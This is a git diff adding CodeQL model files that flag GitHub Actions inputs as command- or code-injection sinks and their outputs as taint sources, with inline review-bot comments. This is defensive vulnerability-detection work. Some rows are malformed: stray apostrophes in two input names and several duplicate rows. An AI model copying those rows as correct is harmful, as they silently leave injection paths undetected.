+ - ["py-actions/flake8", "*", "input.max-line-length", "command-injection", "manual"]
+ - ["py-actions/flake8", "*", "input.args", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/py-actions_py-dependency-install.model.yml b/actions/ql/lib/ext/manual/py-actions_py-dependency-install.model.yml
new file mode 100644
index 000000000000..ce637b1b0c52
--- /dev/null
+++ b/actions/ql/lib/ext/manual/py-actions_py-dependency-install.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["py-actions/py-dependency-install", "*", "input.path", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/pyo3_maturin-action.model.yml b/actions/ql/lib/ext/manual/pyo3_maturin-action.model.yml
new file mode 100644
index 000000000000..95d63525c575
--- /dev/null
+++ b/actions/ql/lib/ext/manual/pyo3_maturin-action.model.yml
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["pyo3/maturin-action", "*", "input.before-script-linux", "command-injection", "manual"]
+ - ["pyo3/maturin-action", "*", "input.target", "command-injection", "manual"]
+ - ["pyo3/maturin-action", "*", "input.command", "command-injection", "manual"]
+ - ["pyo3/maturin-action", "*", "input.manylinux", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/reactivecircus_android-emulator-runner.model.yml b/actions/ql/lib/ext/manual/reactivecircus_android-emulator-runner.model.yml
new file mode 100644
index 000000000000..d89f4582f67b
--- /dev/null
+++ b/actions/ql/lib/ext/manual/reactivecircus_android-emulator-runner.model.yml
@@ -0,0 +1,24 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["reactivecircus/android-emulator-runner", "*", "input.api-level", "command-injection", "manual"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.target", "command-injection", "manual"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.arch", "command-injection", "manual"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.profile", "command-injection", "manual"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.sdcard-path-or-size'", "command-injection", "manual"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.cores", "command-injection", "manual"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ram-size", "command-injection", "manual"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.heap-size", "command-injection", "manual"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.disk-size", "command-injection", "manual"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.emulator-options", "command-injection", "manual"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.emulator-build", "command-injection", "manual"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.cmake", "command-injection", "manual"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/read-file-actions.model.yml b/actions/ql/lib/ext/manual/read-file-actions.model.yml
new file mode 100644
index 000000000000..27130231df9c
--- /dev/null
+++ b/actions/ql/lib/ext/manual/read-file-actions.model.yml
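Review bot: The `input.sdcard-path-or-size'` row in this hunk has a stray apostrophe inside the input name, so the sink row can never match the action's real `sdcard-path-or-size` input and that input silently goes unmodelled; the same slip appears as `input.tag-prefix'` in the tripss/conventional-changelog-action hunk. The fix is to drop the quote: `- ["reactivecircus/android-emulator-runner", "*", "input.sdcard-path-or-size", "command-injection", "manual"]`. The `input.ndk` row is also repeated seven times here, and `pietrobolcato/action-read-yaml` in read-file-actions.model.yml and `input.url` in veracode_veracode-sca.model.yml are likewise duplicated; duplicate rows are harmless to the extensible predicate but read as copy-paste leftovers, so one row each suffices. Since every listed input is modelled as a command-injection sink, it would help reviewers to note in a header comment which inputs were verified to reach a shell command in the action, so the list is not later pruned as over-broad.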
@@ -0,0 +1,37 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["juliangruber/read-file-action", "*", "artifact", "output.content", "taint", "manual"]
+ - ["bfren/read-file", "*", "artifact", "output.contents", "taint", "manual"]
+ - ["igorskyflyer/action-readfile", "*", "artifact", "output.content", "taint", "manual"]
+ - ["komorebitech/read-files-action", "*", "artifact", "output.content", "taint", "manual"]
+ - ["jaywcjlove/github-action-read-file", "*", "artifact", "output.content", "taint", "manual"]
+ - ["andstor/file-reader-action", "*", "artifact", "output.contents", "taint", "manual"]
+ - ["Reedyuk/read-properties", "*", "artifact", "output.value", "taint", "manual"]
+ - ["browniebroke/read-nvmrc-action", "*", "artifact", "output.node_version", "taint", "manual"]
+ - ["jbutcher5/read-yaml", "*", "artifact", "output.data", "taint", "manual"]
+ - ["christian-draeger/read-properties", "*", "artifact", "output.*", "taint", "manual"]
+ - ["traversals-analytics-and-intelligence/file-reader-action", "*", "artifact", "output.content", "taint", "manual"]
+ - ["pietrobolcato/action-read-yaml", "*", "artifact", "output.*", "taint", "manual"]
+ - ["satya-500/read-file-github-action", "*", "artifact", "output.contents", "taint", "manual"]
+ - ["guibranco/github-file-reader-action-v2", "*", "artifact", "output.contents", "taint", "manual"]
+ - ["gagle/package-version", "*", "artifact", "output.version", "taint", "manual"]
+ - ["ActionsTools/read-json-action", "*", "artifact", "output.*", "taint", "manual"]
+ - ["madhead/read-java-properties", "*", "artifact", "output.*", "taint", "manual"]
+ - ["pietrobolcato/action-read-yaml", "*", "artifact", "output.*", "taint", "manual"]
+ - ["rexdefuror/read-package-json", "*", "artifact", "env.*", "taint", "manual"]
+ - ["BrycensRanch/read-properties-action", "*", "artifact", "output.*", "taint", "manual"]
+ - ["kurt-code/gha-properties", "*", "artifact", "output.*", "taint", "manual"]
+ - ["SebRollen/toml-action", "*", "artifact", "output.value", "taint", "manual"]
+ - ["simonblund/version-reader", "*", "artifact", "output.version", "taint", "manual"]
+ - ["mindsers/changelog-reader-action", "*", "artifact", "output.*", "taint", "manual"]
+ - ["nichmor/minimal-read-yaml", "*", "artifact", "output.*", "taint", "manual"]
+ - ["miraai/read-helm-chart-yaml", "*", "artifact", "output.*", "taint", "manual"]
+ - ["dangdennis/toml-action", "*", "artifact", "output.value", "taint", "manual"]
+ - ["artlaman/conventional-changelog-reader-action", "*", "artifact", "output.*", "taint", "manual"]
+ - ["romanlamsal/dotenv-concat", "*", "artifact", "output.*", "taint", "manual"]
+ - ["sammcj/dotenv-output-action", "*", "artifact", "output.*", "taint", "manual"]
+ - ["c-py/action-dotenv-to-setenv", "*", "artifact", "output.*", "taint", "manual"]
+ - ["duskmoon314/action-load-env", "*", "artifact", "output.*", "taint", "manual"]
diff --git a/actions/ql/lib/ext/manual/redhat-plumbers-in-action_download-artifact.model.yml b/actions/ql/lib/ext/manual/redhat-plumbers-in-action_download-artifact.model.yml
new file mode 100644
index 000000000000..9157cec03dd0
--- /dev/null
+++ b/actions/ql/lib/ext/manual/redhat-plumbers-in-action_download-artifact.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSourceModel
+ data:
+ - ["redhat-plumbers-in-action/download-artifact", "*", "output.*", "artifact", "manual"]
+
diff --git a/actions/ql/lib/ext/manual/reggionick_s3-deploy.model.yml b/actions/ql/lib/ext/manual/reggionick_s3-deploy.model.yml
new file mode 100644
index 000000000000..359c3b0e2225
--- /dev/null
+++ b/actions/ql/lib/ext/manual/reggionick_s3-deploy.model.yml
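Review bot: The `rexdefuror/read-package-json` row is the only one in this summary whose output column is `env.*` instead of an `output.*` name, and nothing in the file says whether that is deliberate; next to 31 `output.*` rows it reads like a typo, so either correct it or annotate it with `# read-package-json exports the parsed fields as environment variables, not step outputs` if that is what was verified. Several first-column names are mixed-case (`Reedyuk`, `ActionsTools`, `BrycensRanch`, `SebRollen`) while workflows commonly write `uses:` references in lowercase; if the matching predicate compares the action name case-sensitively these rows will miss the common spelling, which is worth confirming against the matcher. A one-line header such as `# File-reading actions: the 'artifact' input column marks the file read from the checkout, not a declared action input` would also explain why the input column differs from every other model file in this directory.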
@@ -0,0 +1,13 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["reggionick/s3-deploy", "*", "input.bucket", "command-injection", "manual"]
+ - ["reggionick/s3-deploy", "*", "input.bucket-region", "command-injection", "manual"]
+ - ["reggionick/s3-deploy", "*", "input.dist-id", "command-injection", "manual"]
+ - ["reggionick/s3-deploy", "*", "input.invalidation", "command-injection", "manual"]
+ - ["reggionick/s3-deploy", "*", "input.delete-removed", "command-injection", "manual"]
+ - ["reggionick/s3-deploy", "*", "input.cacheControl", "command-injection", "manual"]
+ - ["reggionick/s3-deploy", "*", "input.cache", "command-injection", "manual"]
+ - ["reggionick/s3-deploy", "*", "input.files-to-include", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/release-kit_regex.model.yml b/actions/ql/lib/ext/manual/release-kit_regex.model.yml
new file mode 100644
index 000000000000..8534ccc599a3
--- /dev/null
+++ b/actions/ql/lib/ext/manual/release-kit_regex.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["release-kit/regex", "*", "input.string", "output.*", "taint", "manual"]
+
diff --git a/actions/ql/lib/ext/manual/renovatebot_github-action.model.yml b/actions/ql/lib/ext/manual/renovatebot_github-action.model.yml
new file mode 100644
index 000000000000..136e4aa9e418
--- /dev/null
+++ b/actions/ql/lib/ext/manual/renovatebot_github-action.model.yml
@@ -0,0 +1,10 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["renovatebot/github-action", "*", "input.renovate-image", "command-injection", "manual"]
+ - ["renovatebot/github-action", "*", "input.renovate-version", "command-injection", "manual"]
+ - ["renovatebot/github-action", "*", "input.docker-cmd-file", "command-injection", "manual"]
+ - ["renovatebot/github-action", "*", "input.docker-user", "command-injection", "manual"]
+ - ["renovatebot/github-action", "*", "input.docker-volumes", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/rishabh510_path-lister-action.model.yml b/actions/ql/lib/ext/manual/rishabh510_path-lister-action.model.yml
new file mode 100644
index 000000000000..428115a7bd71
--- /dev/null
+++ b/actions/ql/lib/ext/manual/rishabh510_path-lister-action.model.yml
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSourceModel
+ data:
+ # https://github.com/Rishabh510/Path-lister-action
+ - ["Rishabh510/Path-lister-action", "*", "output.paths", "filename", "manual"]
+
+
diff --git a/actions/ql/lib/ext/manual/roots_issue-closer-action.model.yml b/actions/ql/lib/ext/manual/roots_issue-closer-action.model.yml
new file mode 100644
index 000000000000..be313c017115
--- /dev/null
+++ b/actions/ql/lib/ext/manual/roots_issue-closer-action.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["roots/issue-closer-action", "*", "input.issue-close-message", "code-injection", "manual"]
+ - ["roots/issue-closer-action", "*", "input.pr-close-message", "code-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/ros-tooling_setup-ros.model.yml b/actions/ql/lib/ext/manual/ros-tooling_setup-ros.model.yml
new file mode 100644
index 000000000000..74e55a9bf4e2
--- /dev/null
+++ b/actions/ql/lib/ext/manual/ros-tooling_setup-ros.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["ros-tooling/setup-ros", "*", "input.required-ros-distributions", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/ruby_setup-ruby.model.yml b/actions/ql/lib/ext/manual/ruby_setup-ruby.model.yml
new file mode 100644
index 000000000000..785616390b39
--- /dev/null
+++ b/actions/ql/lib/ext/manual/ruby_setup-ruby.model.yml
@@ -0,0 +1,11 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint", "manual"]
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["ruby/setup-ruby", "*", "input.ruby-version", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/salsify_action-detect-and-tag-new-version.model.yml b/actions/ql/lib/ext/manual/salsify_action-detect-and-tag-new-version.model.yml
new file mode 100644
index 000000000000..06de2990adf6
--- /dev/null
+++ b/actions/ql/lib/ext/manual/salsify_action-detect-and-tag-new-version.model.yml
@@ -0,0 +1,11 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint", "manual"]
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["salsify/action-detect-and-tag-new-version", "*", "input.version-command", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/sergeysova_jq-action.model.yml b/actions/ql/lib/ext/manual/sergeysova_jq-action.model.yml
new file mode 100644
index 000000000000..a2ca3eae7844
--- /dev/null
+++ b/actions/ql/lib/ext/manual/sergeysova_jq-action.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["sergeysova/jq-action", "*", "input.cmd", "code-injection", "manual"]
+
diff --git a/actions/ql/lib/ext/manual/shallwefootball_upload-s3-action.model.yml b/actions/ql/lib/ext/manual/shallwefootball_upload-s3-action.model.yml
new file mode 100644
index 000000000000..962c7431b758
--- /dev/null
+++ b/actions/ql/lib/ext/manual/shallwefootball_upload-s3-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["shallwefootball/upload-s3-action", "*", "input.destination_dir", "output.object_key", "taint", "manual"]
diff --git a/actions/ql/lib/ext/manual/shogo82148_actions-setup-perl.model.yml b/actions/ql/lib/ext/manual/shogo82148_actions-setup-perl.model.yml
new file mode 100644
index 000000000000..ebe62b37a6fd
--- /dev/null
+++ b/actions/ql/lib/ext/manual/shogo82148_actions-setup-perl.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["shogo82148/actions-setup-perl", "*", "input.working-directory", "env.PERL5LIB", "taint", "manual"]
diff --git a/actions/ql/lib/ext/manual/skitionek_notify-microsoft-teams.model.yml b/actions/ql/lib/ext/manual/skitionek_notify-microsoft-teams.model.yml
new file mode 100644
index 000000000000..64d8ec1b7a58
--- /dev/null
+++ b/actions/ql/lib/ext/manual/skitionek_notify-microsoft-teams.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["skitionek/notify-microsoft-teams", "*", "input.overwrite", "code-injection", "manual"]
\ No newline at end of file
diff --git a/actions/ql/lib/ext/manual/snow-actions_eclint.model.yml b/actions/ql/lib/ext/manual/snow-actions_eclint.model.yml
new file mode 100644
index 000000000000..49ba12d47a24
--- /dev/null
+++ b/actions/ql/lib/ext/manual/snow-actions_eclint.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["snow-actions/eclint", "*", "input.args", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/stackhawk_hawkscan-action.model.yml b/actions/ql/lib/ext/manual/stackhawk_hawkscan-action.model.yml
new file mode 100644
index 000000000000..396c480c4cdc
--- /dev/null
+++ b/actions/ql/lib/ext/manual/stackhawk_hawkscan-action.model.yml
@@ -0,0 +1,10 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["stackhawk/hawkscan-action", "*", "input.workspace", "command-injection", "manual"]
+ - ["stackhawk/hawkscan-action", "*", "input.apiKey", "command-injection", "manual"]
+ - ["stackhawk/hawkscan-action", "*", "input.command", "command-injection", "manual"]
+ - ["stackhawk/hawkscan-action", "*", "input.args", "command-injection", "manual"]
+ - ["stackhawk/hawkscan-action", "*", "input.version", "command-injection", "manual"]
\ No newline at end of file
diff --git a/actions/ql/lib/ext/manual/step-security_harden-runner.model.yml b/actions/ql/lib/ext/manual/step-security_harden-runner.model.yml
new file mode 100644
index 000000000000..129c8beb0202
--- /dev/null
+++ b/actions/ql/lib/ext/manual/step-security_harden-runner.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["step-security/harden-runner", "*", "input.allowed-endpoints", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/suisei-cn_actions-download-file.model.yml b/actions/ql/lib/ext/manual/suisei-cn_actions-download-file.model.yml
new file mode 100644
index 000000000000..343c0efe42aa
--- /dev/null
+++ b/actions/ql/lib/ext/manual/suisei-cn_actions-download-file.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["suisei-cn/actions-download-file", "*", "input.filename", "output.filename", "taint", "manual"]
diff --git a/actions/ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml b/actions/ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml
new file mode 100644
index 000000000000..6ca3eb0c1607
--- /dev/null
+++ b/actions/ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSourceModel
+ data:
+ # https://github.com/the-coding-turtle/ga-file-list
+ - ["the-coding-turtle/ga-file-list", "*", "output.files", "filename", "manual"]
+ - ["the-coding-turtle/ga-file-list", "*", "output.file_names", "filename", "manual"]
diff --git a/actions/ql/lib/ext/manual/tibdex_backport.model.yml b/actions/ql/lib/ext/manual/tibdex_backport.model.yml
new file mode 100644
index 000000000000..956c9afc8e40
--- /dev/null
+++ b/actions/ql/lib/ext/manual/tibdex_backport.model.yml
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["tibdex/backport", "*", "input.body_template", "code-injection", "manual"]
+ - ["tibdex/backport", "*", "input.head_template", "code-injection", "manual"]
+ - ["tibdex/backport", "*", "input.labels_template", "code-injection", "manual"]
+ - ["tibdex/backport", "*", "input.title_template", "code-injection", "manual"]
\ No newline at end of file
diff --git a/actions/ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml b/actions/ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml
new file mode 100644
index 000000000000..e49643d1f155
--- /dev/null
+++ b/actions/ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSourceModel
+ data:
+ - ["tim-actions/get-pr-commits", "*", "output.commits", "text", "manual"]
+
diff --git a/actions/ql/lib/ext/manual/timheuer_base64-to-file.model.yml b/actions/ql/lib/ext/manual/timheuer_base64-to-file.model.yml
new file mode 100644
index 000000000000..c9b65a303798
--- /dev/null
+++ b/actions/ql/lib/ext/manual/timheuer_base64-to-file.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["timheuer/base64-to-file", "*", "input.fileName", "output.filePath", "taint", "manual"]
+ - ["timheuer/base64-to-file", "*", "input.fileDir", "output.filePath", "taint", "manual"]
diff --git a/actions/ql/lib/ext/manual/tj-actions_branch-names.model.yml b/actions/ql/lib/ext/manual/tj-actions_branch-names.model.yml
new file mode 100644
index 000000000000..386142a2d128
--- /dev/null
+++ b/actions/ql/lib/ext/manual/tj-actions_branch-names.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSourceModel
+ data:
+ # https://github.com/tj-actions/branch-names
+ - ["tj-actions/branch-names", "*", "output.current_branch", "branch", "manual"]
+ - ["tj-actions/branch-names", "*", "output.head_ref_branch", "branch", "manual"]
diff --git a/actions/ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml b/actions/ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml
new file mode 100644
index 000000000000..3cfedbdec2c8
--- /dev/null
+++ b/actions/ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["tmelliottjr/extract-regex-action", "*", "input.input", "output.resultString", "taint", "manual"]
+ - ["tmelliottjr/extract-regex-action", "*", "input.input", "output.resultArray", "taint", "manual"]
+
diff --git a/actions/ql/lib/ext/manual/trilom_file-changes-action.model.yml b/actions/ql/lib/ext/manual/trilom_file-changes-action.model.yml
new file mode 100644
index 000000000000..9d5b8b88ce2f
--- /dev/null
+++ b/actions/ql/lib/ext/manual/trilom_file-changes-action.model.yml
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSourceModel
+ data:
+ - ["trilom/file-changes-action", "*", "output.files", "filename", "manual"]
+ - ["trilom/file-changes-action", "*", "output.files_added", "filename", "manual"]
+ - ["trilom/file-changes-action", "*", "output.files_modified", "filename", "manual"]
+ - ["trilom/file-changes-action", "*", "output.files_removed", "filename", "manual"]
diff --git a/actions/ql/lib/ext/manual/tripss_conventional-changelog-action.model.yml b/actions/ql/lib/ext/manual/tripss_conventional-changelog-action.model.yml
new file mode 100644
index 000000000000..3893986830a0
--- /dev/null
+++ b/actions/ql/lib/ext/manual/tripss_conventional-changelog-action.model.yml
@@ -0,0 +1,15 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["tripss/conventional-changelog-action", "*", "input.pre-release-identifier", "command-injection", "manual"]
+ - ["tripss/conventional-changelog-action", "*", "input.git-user-name", "command-injection", "manual"]
+ - ["tripss/conventional-changelog-action", "*", "input.git-user-email", "command-injection", "manual"]
+ - ["tripss/conventional-changelog-action", "*", "input.git-url", "command-injection", "manual"]
+ - ["tripss/conventional-changelog-action", "*", "input.github-token", "command-injection", "manual"]
+ - ["tripss/conventional-changelog-action", "*", "input.git-pull-method", "command-injection", "manual"]
+ - ["tripss/conventional-changelog-action", "*", "input.fallback-version", "command-injection", "manual"]
+ - ["tripss/conventional-changelog-action", "*", "input.git-message", "command-injection", "manual"]
+ - ["tripss/conventional-changelog-action", "*", "input.git-branch", "command-injection", "manual"]
+ - ["tripss/conventional-changelog-action", "*", "input.tag-prefix'", "command-injection", "manual"]
\ No newline at end of file
diff --git a/actions/ql/lib/ext/manual/tryghost_action-deploy-theme.model.yml b/actions/ql/lib/ext/manual/tryghost_action-deploy-theme.model.yml
new file mode 100644
index 000000000000..f2f99cc744a0
--- /dev/null
+++ b/actions/ql/lib/ext/manual/tryghost_action-deploy-theme.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["tryghost/action-deploy-theme", "*", "input.theme-name", "command-injection", "manual"]
+ - ["tryghost/action-deploy-theme", "*", "input.exclude", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/tzkhan_pr-update-action.model.yml b/actions/ql/lib/ext/manual/tzkhan_pr-update-action.model.yml
new file mode 100644
index 000000000000..5a226f121032
--- /dev/null
+++ b/actions/ql/lib/ext/manual/tzkhan_pr-update-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSourceModel
+ data:
+ - ["tzkhan/pr-update-action", "*", "output.headMatch", "branch", "manual"]
diff --git a/actions/ql/lib/ext/manual/veracode_veracode-sca.model.yml b/actions/ql/lib/ext/manual/veracode_veracode-sca.model.yml
new file mode 100644
index 000000000000..d3e1daae67ac
--- /dev/null
+++ b/actions/ql/lib/ext/manual/veracode_veracode-sca.model.yml
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["veracode/veracode-sca", "*", "input.url", "command-injection", "manual"]
+ - ["veracode/veracode-sca", "*", "input.path", "command-injection", "manual"]
+ - ["veracode/veracode-sca", "*", "input.skip-collectors", "command-injection", "manual"]
+ - ["veracode/veracode-sca", "*", "input.url", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/w3f_action-find-old-files.model.yml b/actions/ql/lib/ext/manual/w3f_action-find-old-files.model.yml
new file mode 100644
index 000000000000..91a9ad11aa6d
--- /dev/null
+++ b/actions/ql/lib/ext/manual/w3f_action-find-old-files.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSourceModel
+ data:
+ # https://github.com/w3f/action-find-old-files
+ - ["w3f/action-find-old-files", "*", "output.files", "filename", "manual"]
+
diff --git a/actions/ql/lib/ext/manual/wearerequired_lint-action.model.yml b/actions/ql/lib/ext/manual/wearerequired_lint-action.model.yml
new file mode 100644
index 000000000000..b1f8b91a22de
--- /dev/null
+++ b/actions/ql/lib/ext/manual/wearerequired_lint-action.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["wearerequired/lint-action", "*", "input.git_name", "command-injection", "manual"]
+ - ["wearerequired/lint-action", "*", "input.git_email", "command-injection", "manual"]
+ - ["wearerequired/lint-action", "*", "input.commit_message", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/webfactory_ssh-agent.model.yml b/actions/ql/lib/ext/manual/webfactory_ssh-agent.model.yml
new file mode 100644
index 000000000000..48b11c1c5b20
--- /dev/null
+++ b/actions/ql/lib/ext/manual/webfactory_ssh-agent.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["webfactory/ssh-agent", "*", "input.ssh-agent-cmd", "command-injection", "manual"]
+ - ["webfactory/ssh-agent", "*", "input.ssh-add-cmd", "command-injection", "manual"]
+ - ["webfactory/ssh-agent", "*", "input.git-cmd", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/xom9ikk_dotenv.model.yml b/actions/ql/lib/ext/manual/xom9ikk_dotenv.model.yml
new file mode 100644
index 000000000000..1ed8c0fd3f7c
--- /dev/null
+++ b/actions/ql/lib/ext/manual/xom9ikk_dotenv.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["xom9ikk/dotenv", "*", "artifact", "envvar-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml b/actions/ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml new file mode 100644 index 000000000000..bfbd1dd12e6e --- /dev/null +++ b/actions/ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSourceModel + data: + - ["xt0rted/pull-request-comment-branch", "*", "output.head_ref", "branch", "manual"] + diff --git a/actions/ql/lib/ext/manual/yumemi-inc_changed-files.model.yml b/actions/ql/lib/ext/manual/yumemi-inc_changed-files.model.yml new file mode 100644 index 000000000000..db61e9171a87 --- /dev/null +++ b/actions/ql/lib/ext/manual/yumemi-inc_changed-files.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSourceModel + data: + # https://github.com/yumemi-inc/changed-files + - ["yumemi-inc/changed-files", "*", "output.files", "filename", "manual"] + + diff --git a/actions/ql/lib/ext/manual/zaproxy_action-baseline.model.yml b/actions/ql/lib/ext/manual/zaproxy_action-baseline.model.yml new file mode 100644 index 000000000000..309045ee58dc --- /dev/null +++ b/actions/ql/lib/ext/manual/zaproxy_action-baseline.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["zaproxy/action-baseline", "*", "input.docker_name", "command-injection", "manual"] + - ["zaproxy/action-baseline", "*", "input.target", "command-injection", "manual"] + - ["zaproxy/action-baseline", "*", "input.rules_file_name", "command-injection", "manual"] + - ["zaproxy/action-baseline", "*", "input.cmd_options", "command-injection", "manual"] \ No newline at end of file diff --git a/actions/ql/lib/ext/manual/zaproxy_action-full-scan.model.yml b/actions/ql/lib/ext/manual/zaproxy_action-full-scan.model.yml new file mode 100644 index 000000000000..9da3749ebe45 --- /dev/null 
